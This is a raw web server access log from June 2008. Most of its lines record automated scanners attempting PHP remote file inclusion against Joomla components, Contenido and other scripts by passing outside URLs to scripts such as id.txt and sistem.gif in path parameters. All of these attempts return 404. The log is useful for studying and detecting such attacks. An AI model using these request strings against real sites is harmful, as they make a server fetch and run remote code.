202.53.78.212 - - [27/Jun/2008:20:01:15 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:20:01:16 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
60.62.197.197 - - [27/Jun/2008:20:01:55 -0500] "GET /costume/enter1.gif HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:01:55 -0500] "GET /costume/history5.gif HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:01:55 -0500] "GET /costume/ HTTP/1.1" 200 - "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
219.154.22.244 - - [27/Jun/2008:20:03:53 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:20:03:53 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
202.43.35.133 - - [27/Jun/2008:20:05:15 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:05:17 -0500] "GET /SQuery/lib/gore.php?libpath=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:05:33 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:05:34 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
81.167.52.36 - - [27/Jun/2008:20:05:40 -0500] "GET /logs/admin.php?include_path=http://socdsp13.ee.nchu.edu.tw/phpbb2//language/lang_english/email/ReadMe.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
81.167.52.36 - - [27/Jun/2008:20:05:40 -0500] "GET /admin.php?include_path=http://socdsp13.ee.nchu.edu.tw/phpbb2//language/lang_english/email/ReadMe.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
219.154.22.244 - - [27/Jun/2008:20:05:59 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:20:06:00 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
81.167.52.36 - - [27/Jun/2008:20:07:40 -0500] "GET /logs/admin.php?include_path=http://socdsp13.ee.nchu.edu.tw/phpbb2//language/lang_english/email/ReadMe.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
81.167.52.36 - - [27/Jun/2008:20:07:41 -0500] "GET /admin.php?include_path=http://socdsp13.ee.nchu.edu.tw/phpbb2//language/lang_english/email/ReadMe.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:20:09:30 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
195.12.53.176 - - [27/Jun/2008:20:09:51 -0500] "GET /errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
61.221.64.124 - - [27/Jun/2008:20:10:10 -0500] "GET /logs/!scanhttp://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 343 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:20:10:18 -0500] "GET /!scanhttp://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 338 "-""libwww-perl/5.63"
202.53.78.212 - - [27/Jun/2008:20:10:22 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:20:10:23 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
202.86.8.102 - - [27/Jun/2008:20:11:36 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:20:11:37 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:20:11:37 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:20:11:38 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
61.221.64.124 - - [27/Jun/2008:20:12:50 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:20:12:51 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 328 "-""libwww-perl/5.63"
202.53.78.212 - - [27/Jun/2008:20:15:06 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:20:15:06 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.43.35.133 - - [27/Jun/2008:20:15:09 -0500] "GET /logs/tools/send_reminders.php?includedir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:15:10 -0500] "GET /tools/send_reminders.php?includedir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
59.188.4.56 - - [27/Jun/2008:20:16:21 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:20:16:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
61.221.64.124 - - [27/Jun/2008:20:17:33 -0500] "GET /logs/!scanhttp://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 343 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:20:17:37 -0500] "GET /!scanhttp://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 338 "-""libwww-perl/5.63"
219.93.96.46 - - [27/Jun/2008:20:19:31 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:20:19:32 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.216.249.151 - - [27/Jun/2008:20:21:49 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://kelayan.us/KelayanAid?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
209.216.249.151 - - [27/Jun/2008:20:21:52 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://kelayan.us/KelayanAid?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
202.43.35.133 - - [27/Jun/2008:20:24:28 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:24:29 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:26:21 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:26:22 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
67.18.241.90 - - [27/Jun/2008:20:27:29 -0500] "GET /logs//errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
67.18.241.90 - - [27/Jun/2008:20:27:29 -0500] "GET //errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
202.43.35.133 - - [27/Jun/2008:20:29:59 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:29:59 -0500] "GET /SQuery/lib/gore.php?libpath=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
207.58.164.77 - - [27/Jun/2008:20:31:02 -0500] "GET /logs/access_log.1186531200/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:20:31:02 -0500] "GET /index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:20:31:02 -0500] "GET /logs/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:20:31:31 -0500] "GET /logs/access_log.1207785600/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.6.18.227 - - [27/Jun/2008:20:31:55 -0500] "GET /logs/access_log.1213142400 HTTP/1.0" 200 535097 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.43.35.133 - - [27/Jun/2008:20:32:42 -0500] "GET /logs/tools/send_reminders.php?includedir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:32:45 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:32:45 -0500] "GET /tools/send_reminders.php?includedir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:32:45 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:20:33:10 -0500] "GET /logs//atom.php5?page=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:20:33:10 -0500] "GET //atom.php5?page=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
219.93.96.46 - - [27/Jun/2008:20:33:58 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
208.75.225.10 - - [27/Jun/2008:20:34:00 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.yksitie.net/nuoret/robots.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
219.93.96.46 - - [27/Jun/2008:20:34:10 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
202.86.8.102 - - [27/Jun/2008:20:34:35 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:20:34:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:20:34:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
189.25.20.90 - - [27/Jun/2008:20:35:14 -0500] "GET /logs/errors.php?errors=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
189.25.20.90 - - [27/Jun/2008:20:35:15 -0500] "GET /errors.php?errors=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.43.35.133 - - [27/Jun/2008:20:35:52 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:35:52 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:36:32 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:36:32 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
64.34.162.154 - - [27/Jun/2008:20:40:54 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
64.34.162.154 - - [27/Jun/2008:20:40:54 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
64.22.89.194 - - [27/Jun/2008:20:42:10 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.812"
64.22.89.194 - - [27/Jun/2008:20:42:10 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
64.22.89.194 - - [27/Jun/2008:20:42:10 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
202.43.35.133 - - [27/Jun/2008:20:43:37 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:43:40 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
83.172.140.56 - - [27/Jun/2008:20:45:18 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
83.172.140.56 - - [27/Jun/2008:20:45:18 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
83.172.140.56 - - [27/Jun/2008:20:45:18 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
202.43.35.133 - - [27/Jun/2008:20:45:34 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:45:35 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:49:58 -0500] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:49:59 -0500] "GET /inc/functions.inc.php?config[ppa_root_path]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
71.2.6.73 - - [27/Jun/2008:20:50:32 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.2.6.73 - - [27/Jun/2008:20:50:32 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.2.6.73 - - [27/Jun/2008:20:50:33 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.2.6.73 - - [27/Jun/2008:20:50:34 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.2.6.73 - - [27/Jun/2008:20:50:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
71.2.6.73 - - [27/Jun/2008:20:50:42 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.53.197.2 - - [27/Jun/2008:20:52:16 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.79"
74.53.197.2 - - [27/Jun/2008:20:52:16 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
74.53.197.2 - - [27/Jun/2008:20:52:16 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
61.221.64.124 - - [27/Jun/2008:20:54:37 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:20:54:38 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.63"
61.92.108.68 - - [27/Jun/2008:20:55:13 -0500] "GET /logs/access_log.1183507200//tools/send_reminders.php?noSet=0&includedir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
61.92.108.68 - - [27/Jun/2008:20:55:13 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
61.92.108.68 - - [27/Jun/2008:20:55:14 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
85.214.33.25 - - [27/Jun/2008:20:55:18 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:20:55:18 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
209.62.115.202 - - [27/Jun/2008:20:55:31 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:20:55:31 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:56:55 -0500] "GET /logs/send_reminders.php?includedir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:56:56 -0500] "GET /send_reminders.php?includedir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:58:58 -0500] "GET /logs/classes/adodbt/sql.php?classes_dir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:20:58:59 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
61.221.64.124 - - [27/Jun/2008:21:01:52 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 314 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:21:01:53 -0500] "GET //skin/zero_vote/error.php?dir=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 309 "-""libwww-perl/5.63"
202.86.8.102 - - [27/Jun/2008:21:03:22 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:21:03:22 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:21:05:18 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
85.214.33.25 - - [27/Jun/2008:21:05:21 -0500] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:05:21 -0500] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
59.188.4.56 - - [27/Jun/2008:21:05:33 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:05:34 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:05:52 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:05:53 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:05:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
209.62.115.202 - - [27/Jun/2008:21:06:12 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:21:06:12 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
61.221.64.124 - - [27/Jun/2008:21:06:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 314 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:21:06:41 -0500] "GET //skin/zero_vote/error.php?dir=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 309 "-""libwww-perl/5.63"
